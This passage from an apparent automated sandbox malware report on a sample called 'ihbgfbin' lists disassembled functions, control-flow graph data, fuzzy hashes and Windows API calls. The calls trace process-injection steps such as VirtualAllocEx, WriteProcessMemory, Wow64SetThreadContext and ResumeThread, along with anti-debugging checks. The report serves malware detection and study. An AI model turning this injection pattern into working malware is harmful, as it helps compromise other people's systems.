1b0da0 call 1b0db0 call 1b0dd0 call 1b0d70 call 1b0d80 call 1b0d90 call 1b0da0 call 1b0db0 call 1b0dc0 call 1b0d70 call 1b0d80 call 1b0d90 call 1b0da0 call 1b0db0 call 1b0de0 call 1b0df0 call 1b0e00 call 1b0e10 call 1b0e20 call 1b0d70 call 1b0d80 call 1b0d90 call 1b0da0 call 1b0db0 call 1b0d70 call 1b0d80 call 1b0d90 call 1b0da0 call 1b0db0 call 1b0e00 call 1b0e10 call 1b0e20 call 1b0d70 call 1b0d80 call 1b0d90 call 1b0da0 call 1b0db0 call 1b0d70 call 1b0d80 call 1b0d90 call 1b0da0 call 1b0db0 call 1b0de0 call 1b0df0 call 1b0d70 call 1b0d80 call 1b0d90 call 1b0da0 call 1b0db0 call 1b0de0 call 1b0df0 call 1b0e30 call 1b0e40 call 1b0e50 call 1b0e60 * 19 790->791 1132 1b3cbb 791->1132 1133 1b3c93-1b3c9f 791->1133 1134 1b3cc1-1b3dfd call 1b0e70 call 1b0e80 call 1b0e90 call 1b0d90 call 1b0ea0 call 1b0eb0 call 1b0ec0 call 1b0ed0 1132->1134 1135 1b3ca9-1b3caf 1133->1135 1136 1b3ca1-1b3ca7 1133->1136 1137 1b3cb9 1135->1137 1136->1137 1137->1134
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.421727672.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_1b0000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: Ppp$$p$$p$$p
                                                                                                                                                                                    • API String ID: 0-2834240603
                                                                                                                                                                                    • Opcode ID: e1e1007611790eab299e1b3a1883293c3e8f3f9919bfea9d2ae590e7e1462784
                                                                                                                                                                                    • Instruction ID: ebbbb78b445f87577457c06ed214f2c1f8a8a3ba421e977c880f8a8e95e15370
                                                                                                                                                                                    • Opcode Fuzzy Hash: e1e1007611790eab299e1b3a1883293c3e8f3f9919bfea9d2ae590e7e1462784
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E431574A106198FDB25DB64C884BEAB7B2FF89300F1146E9E50D6B361DB70AE85CF44
                                                                                                                                                                                    Function 001B4924 Relevance: 1.6, APIs: 1, Instructions: 105nativeCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 1278 1b4924-1b89eb NtQueryInformationProcess 1281 1b89ed-1b89f3 1278->1281 1282 1b89f4-1b8a2a 1278->1282 1281->1282
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 001B89D5
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.421727672.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_1b0000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InformationProcessQuery
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1778838933-0
                                                                                                                                                                                    • Opcode ID: 4e59758fde59db1e557f4e746343c41e6da340da27a3ee8853292780d80bfdf2
                                                                                                                                                                                    • Instruction ID: 007c9d46875f72601443d3945894c3c178fa688c807d40f10e31b15442ebb44c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e59758fde59db1e557f4e746343c41e6da340da27a3ee8853292780d80bfdf2
                                                                                                                                                                                    • Instruction Fuzzy Hash: F04176B9D042589FCF10CFA9D984AEEFBB5BB49314F20902AE814B7310D735A945CF69
                                                                                                                                                                                    Function 001B891E Relevance: 1.6, APIs: 1, Instructions: 103nativeCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 1294 1b891e-1b89eb NtQueryInformationProcess 1296 1b89ed-1b89f3 1294->1296 1297 1b89f4-1b8a2a 1294->1297 1296->1297
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 001B89D5
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.421727672.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_1b0000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InformationProcessQuery
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1778838933-0
                                                                                                                                                                                    • Opcode ID: 7ea9eb4524fb14b946e25aba7ab734268a6d956a7b7094f0d60d87ef1cfcb01d
                                                                                                                                                                                    • Instruction ID: 2a59fcd60b8e351551f19020046d68719fbf5c8640ddd919f382c7543f80dfb4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7ea9eb4524fb14b946e25aba7ab734268a6d956a7b7094f0d60d87ef1cfcb01d
                                                                                                                                                                                    • Instruction Fuzzy Hash: F94186B9D002589FCF10CFA9D980AEEFBB1BB49314F20902AE814B7310D335A905CF65
                                                                                                                                                                                    Function 001B5CA9 Relevance: .5, Instructions: 515COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.421727672.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_1b0000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 8069398e6663a439c17c677d209ba8a19011a60ad691f553b89ee414a4c5b48e
                                                                                                                                                                                    • Instruction ID: a003cb4d36d1fec4edd45b1a331b26c12e31b3bd19bb7c7079f1c9ccb37a0e00
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8069398e6663a439c17c677d209ba8a19011a60ad691f553b89ee414a4c5b48e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 36426074E01229CFDB54CFA9C984BADBBF2BF88310F1581A9D819A7355D734AA81CF50
                                                                                                                                                                                    Function 001B49D9 Relevance: .5, Instructions: 489COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.421727672.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_1b0000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: f22ccf51969a5c35c6074887966854526b015ce23b41174fdb57b2fee0a6104a
                                                                                                                                                                                    • Instruction ID: b16500dfe3c0e5a925d7336dbd0fb4fab2a233335d86e3f2f641e7e118d44879
                                                                                                                                                                                    • Opcode Fuzzy Hash: f22ccf51969a5c35c6074887966854526b015ce23b41174fdb57b2fee0a6104a
                                                                                                                                                                                    • Instruction Fuzzy Hash: BA32D074901268CFDB54DFA8C584A8EFBB2BF88351F55C59AD448AB212CB30DD85CFA1
                                                                                                                                                                                    Function 001BA298 Relevance: .1, Instructions: 140COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.421727672.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_1b0000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: c56c7e9c9a1ee5af81c31a52f74da790b2ee1b96dd8b998e8cdf076fba71dc28
                                                                                                                                                                                    • Instruction ID: 0c9b3bfd8937878d24e9ea8747a51094cc817a9e6e419e966639291d08b892de
                                                                                                                                                                                    • Opcode Fuzzy Hash: c56c7e9c9a1ee5af81c31a52f74da790b2ee1b96dd8b998e8cdf076fba71dc28
                                                                                                                                                                                    • Instruction Fuzzy Hash: B2519E75D006189FDB08CFEAC8446EEFBB2FF88301F14802AE819AB254DB745A46CF41
                                                                                                                                                                                    Function 001BA28A Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.421727672.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_1b0000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: c1356828b210379eaac96d65793fd842714f20fb34ca424eded89dbbbb75befa
                                                                                                                                                                                    • Instruction ID: 4c574e33f28ac95a3bcf4f4a7d1040b6a1e4f1d2d2cfe04d90859e5d04ca765e
                                                                                                                                                                                    • Opcode Fuzzy Hash: c1356828b210379eaac96d65793fd842714f20fb34ca424eded89dbbbb75befa
                                                                                                                                                                                    • Instruction Fuzzy Hash: CE41C275E006189FDB08CFEAD8956EEFBF2AF89300F14C06AD418AB264DB745A45CF41
                                                                                                                                                                                    Function 00742C50 Relevance: 1.8, APIs: 1, Instructions: 323processCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 1183 742c50-742ce9 1185 742d32-742d5a 1183->1185 1186 742ceb-742d02 1183->1186 1190 742da0-742df6 1185->1190 1191 742d5c-742d70 1185->1191 1186->1185 1189 742d04-742d09 1186->1189 1192 742d2c-742d2f 1189->1192 1193 742d0b-742d15 1189->1193 1199 742e3c-742f33 CreateProcessA 1190->1199 1200 742df8-742e0c 1190->1200 1191->1190 1201 742d72-742d77 1191->1201 1192->1185 1194 742d17 1193->1194 1195 742d19-742d28 1193->1195 1194->1195 1195->1195 1198 742d2a 1195->1198 1198->1192 1219 742f35-742f3b 1199->1219 1220 742f3c-743021 1199->1220 1200->1199 1209 742e0e-742e13 1200->1209 1202 742d79-742d83 1201->1202 1203 742d9a-742d9d 1201->1203 1204 742d85 1202->1204 1205 742d87-742d96 1202->1205 1203->1190 1204->1205 1205->1205 1208 742d98 1205->1208 1208->1203 1211 742e15-742e1f 1209->1211 1212 742e36-742e39 1209->1212 1213 742e21 1211->1213 1214 742e23-742e32 1211->1214 1212->1199 1213->1214 1214->1214 1216 742e34 1214->1216 1216->1212 1219->1220 1232 743031-743035 1220->1232 1233 743023-743027 1220->1233 1235 743045-743049 1232->1235 1236 743037-74303b 1232->1236 1233->1232 1234 743029 1233->1234 1234->1232 1238 743059-74305d 1235->1238 1239 74304b-74304f 1235->1239 1236->1235 1237 74303d 1236->1237 1237->1235 1240 743093-74309e 1238->1240 1241 74305f-743088 1238->1241 1239->1238 1242 743051 1239->1242 1246 74309f 1240->1246 1241->1240 1242->1238 1246->1246
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00742F17
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.421811859.0000000000740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_740000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateProcess
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 963392458-0
                                                                                                                                                                                    • Opcode ID: 3b008aadf58f474e611a5eebbb9849327fa68d089a7665991af1e90775163e59
                                                                                                                                                                                    • Instruction ID: a9893d29b643b5129d167c0d22417e580321d6b877650b592a9e602b5c3d718d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b008aadf58f474e611a5eebbb9849327fa68d089a7665991af1e90775163e59
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2EC12770D002198FDF24CFA8C845BEEBBB1BF09300F0091AAE419B7251DB749A95CF95
                                                                                                                                                                                    Function 007428B0 Relevance: 1.6, APIs: 1, Instructions: 121injectionCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 1247 7428b0-742923 1249 742925-742937 1247->1249 1250 74293a-7429a1 WriteProcessMemory 1247->1250 1249->1250 1252 7429a3-7429a9 1250->1252 1253 7429aa-7429fc 1250->1253 1252->1253
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 0074298B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.421811859.0000000000740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_740000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MemoryProcessWrite
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3559483778-0
                                                                                                                                                                                    • Opcode ID: 507be52c3e0646094abfd334a01e7a41ae65d7f3b96e5c358a22d822624633ce
                                                                                                                                                                                    • Instruction ID: 03b1c6ee88514da9567d2577fb9e294e23608487d85a35b50f0262cbfeb5a044
                                                                                                                                                                                    • Opcode Fuzzy Hash: 507be52c3e0646094abfd334a01e7a41ae65d7f3b96e5c358a22d822624633ce
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E419CB4D012589FCF10CFA9D984AEEFBB1BF49314F24902AE815B7250D378AA55CF64
                                                                                                                                                                                    Function 007428B8 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 1258 7428b8-742923 1260 742925-742937 1258->1260 1261 74293a-7429a1 WriteProcessMemory 1258->1261 1260->1261 1263 7429a3-7429a9 1261->1263 1264 7429aa-7429fc 1261->1264 1263->1264
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 0074298B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.421811859.0000000000740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_740000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MemoryProcessWrite
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3559483778-0
                                                                                                                                                                                    • Opcode ID: 2982dc5950edf98ef8cc190ffa38f8ff2dfd1f41959e4b7ee48c0dd864f54f76
                                                                                                                                                                                    • Instruction ID: 2884bc5bc21eee442fb4273d7e308007c59341c844d391d1ab9654a864821d08
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2982dc5950edf98ef8cc190ffa38f8ff2dfd1f41959e4b7ee48c0dd864f54f76
                                                                                                                                                                                    • Instruction Fuzzy Hash: B541ACB4D002489FCF00CFA9D984AEEFBF1BB49314F24902AE814B7250D338AA55CF64
                                                                                                                                                                                    Function 00742A18 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 1269 742a18-742ae0 ReadProcessMemory 1272 742ae2-742ae8 1269->1272 1273 742ae9-742b3b 1269->1273 1272->1273
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 00742ACA
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.421811859.0000000000740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_740000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MemoryProcessRead
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1726664587-0
                                                                                                                                                                                    • Opcode ID: ad72172b876e34dddc4ec8f0e9b23709d811d1c394d2ed8db948d1d819ec7162
                                                                                                                                                                                    • Instruction ID: 1717380579ea597ec89067283002f32b31adee4ae36ea3628dc2c311f6f7ecf1
                                                                                                                                                                                    • Opcode Fuzzy Hash: ad72172b876e34dddc4ec8f0e9b23709d811d1c394d2ed8db948d1d819ec7162
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0341BAB4D002589FCF10CFAAD884AEEFBB1BF49310F10942AE814B7200D734A956CF68
                                                                                                                                                                                    Function 00742788 Relevance: 1.6, APIs: 1, Instructions: 105memoryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 1285 742788-742850 VirtualAllocEx 1288 742852-742858 1285->1288 1289 742859-7428a3 1285->1289 1288->1289
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0074283A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.421811859.0000000000740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_740000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                                                    • Opcode ID: f9b2b54af87a41c97b00d20cc00be3d9ec6df4e37a5de07d1dcf9492f90792ab
                                                                                                                                                                                    • Instruction ID: 72cce1cbfa6a94593b6bdab06327643504867be50d07cba774e6fdd6c11c568f
                                                                                                                                                                                    • Opcode Fuzzy Hash: f9b2b54af87a41c97b00d20cc00be3d9ec6df4e37a5de07d1dcf9492f90792ab
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D41AAB5D002589FCF10CFA9D984AEEFBB1AF49310F20942AE815B7310D735A956CF55
                                                                                                                                                                                    Function 00742790 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 1300 742790-742850 VirtualAllocEx 1303 742852-742858 1300->1303 1304 742859-7428a3 1300->1304 1303->1304
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0074283A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.421811859.0000000000740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_740000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                                                    • Opcode ID: 9a7cc42fa2d9605e61a3a071601e1de8a9c2b76aad7141b970c0341821595078
                                                                                                                                                                                    • Instruction ID: 67e55cf0cb1b931165be39cdf8a75536c274163f18bc5031b9b6ef86f0283612
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a7cc42fa2d9605e61a3a071601e1de8a9c2b76aad7141b970c0341821595078
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7941AAB4D002489FCF10CFA9D980AAEFBB5AF49310F10942AE815B7300D735A956CF55
                                                                                                                                                                                    Function 00742220 Relevance: 1.6, APIs: 1, Instructions: 99threadCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 1309 742220-742288 1311 74229f-7422ed Wow64SetThreadContext 1309->1311 1312 74228a-74229c 1309->1312 1314 7422f6-742342 1311->1314 1315 7422ef-7422f5 1311->1315 1312->1311 1315->1314
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 007422D7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.421811859.0000000000740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_740000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ContextThreadWow64
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 983334009-0
                                                                                                                                                                                    • Opcode ID: 94875472fe7509cee1d127a7d9b752b764d51a929a122dfac470ddf95cbe685e
                                                                                                                                                                                    • Instruction ID: 50c1bcf76b2fd2ded0433f8aca92111affcbbcca123fa34b3a4e917ac03d9572
                                                                                                                                                                                    • Opcode Fuzzy Hash: 94875472fe7509cee1d127a7d9b752b764d51a929a122dfac470ddf95cbe685e
                                                                                                                                                                                    • Instruction Fuzzy Hash: B541CEB4D002589FCF10CFA9D884AEEFBB1BF49314F24802AE415B7244C7789945CF54
                                                                                                                                                                                    Function 001B9882 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 1320 1b9882-1b9884 1321 1b984f-1b985e 1320->1321 1322 1b9886-1b98e1 1320->1322 1323 1b9860 1321->1323 1324 1b9865-1b986a call 1b8fd4 1321->1324 1328 1b98e3-1b98f2 1322->1328 1329 1b98f5-1b9938 OutputDebugStringW 1322->1329 1323->1324 1327 1b986f-1b9873 1324->1327 1328->1329 1330 1b993a-1b9940 1329->1330 1331 1b9941-1b996f 1329->1331 1330->1331
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • OutputDebugStringW.KERNEL32(?), ref: 001B9922
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.421727672.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_1b0000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugOutputString
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1166629820-0
                                                                                                                                                                                    • Opcode ID: 7c29428cba1c27d4514927fab4963a958d9a7e6f4d6773cc8433dd49b6f97a7d
                                                                                                                                                                                    • Instruction ID: 431fe2eff8fde892a87aa41030b05364cae23aff2a05b23ee765ef9a9270b07f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7c29428cba1c27d4514927fab4963a958d9a7e6f4d6773cc8433dd49b6f97a7d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D41CAB4D002489FCB14CFA9D884AEEFBF1AF49314F24806AE818B7320D734A946CF54
                                                                                                                                                                                    Function 00742228 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 1334 742228-742288 1336 74229f-7422ed Wow64SetThreadContext 1334->1336 1337 74228a-74229c 1334->1337 1339 7422f6-742342 1336->1339 1340 7422ef-7422f5 1336->1340 1337->1336 1340->1339
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 007422D7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.421811859.0000000000740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_740000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ContextThreadWow64
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 983334009-0
                                                                                                                                                                                    • Opcode ID: 2ae601f6addee092af236e7839a5edb52b16dcabd1a142669bc36ed0ed9ddcbf
                                                                                                                                                                                    • Instruction ID: e8d3e8aed365212e1c6cca3340b1007e0359d1f9358d0f05f9794b35718d09f6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ae601f6addee092af236e7839a5edb52b16dcabd1a142669bc36ed0ed9ddcbf
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1D41ACB5D002589FCF10CFA9D884AEEFBB1BF49314F24842AE415B7244D778A945CF54
                                                                                                                                                                                    Function 001B8FAC Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 1345 1b8fac-1b98e1 1348 1b98e3-1b98f2 1345->1348 1349 1b98f5-1b9938 OutputDebugStringW 1345->1349 1348->1349 1350 1b993a-1b9940 1349->1350 1351 1b9941-1b996f 1349->1351 1350->1351
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • OutputDebugStringW.KERNEL32(?), ref: 001B9922
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.421727672.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_1b0000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugOutputString
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1166629820-0
                                                                                                                                                                                    • Opcode ID: 70d965485b310f39ff5e75347d9358e1186ed9688dc50660f69cb95f35234d21
                                                                                                                                                                                    • Instruction ID: ebd0c9817c2512574f6771eebdf4d20fc828e108ddf17455fd5eb4c997a6cb05
                                                                                                                                                                                    • Opcode Fuzzy Hash: 70d965485b310f39ff5e75347d9358e1186ed9688dc50660f69cb95f35234d21
                                                                                                                                                                                    • Instruction Fuzzy Hash: D2319DB4D002099FCF14CF99D584AEEFBF1AB49314F14906AE918B7310D334A945CFA4
                                                                                                                                                                                    Function 00742131 Relevance: 1.6, APIs: 1, Instructions: 82threadCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.421811859.0000000000740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_740000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ResumeThread
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 947044025-0
                                                                                                                                                                                    • Opcode ID: a56c578c11147893173a634afa7d9d32ad7cc31851f3ac336f45cbb1d49e5f75
                                                                                                                                                                                    • Instruction ID: 20c90d4870591d0b0712e4dad9dee1b615b78cb20ec020ea8a869505e1c342c9
                                                                                                                                                                                    • Opcode Fuzzy Hash: a56c578c11147893173a634afa7d9d32ad7cc31851f3ac336f45cbb1d49e5f75
                                                                                                                                                                                    • Instruction Fuzzy Hash: B931CCB5D002489FCF14CFA9D884AEEFBB1AF49314F14946AE815B7310C739A946CFA4
                                                                                                                                                                                    Function 00742138 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
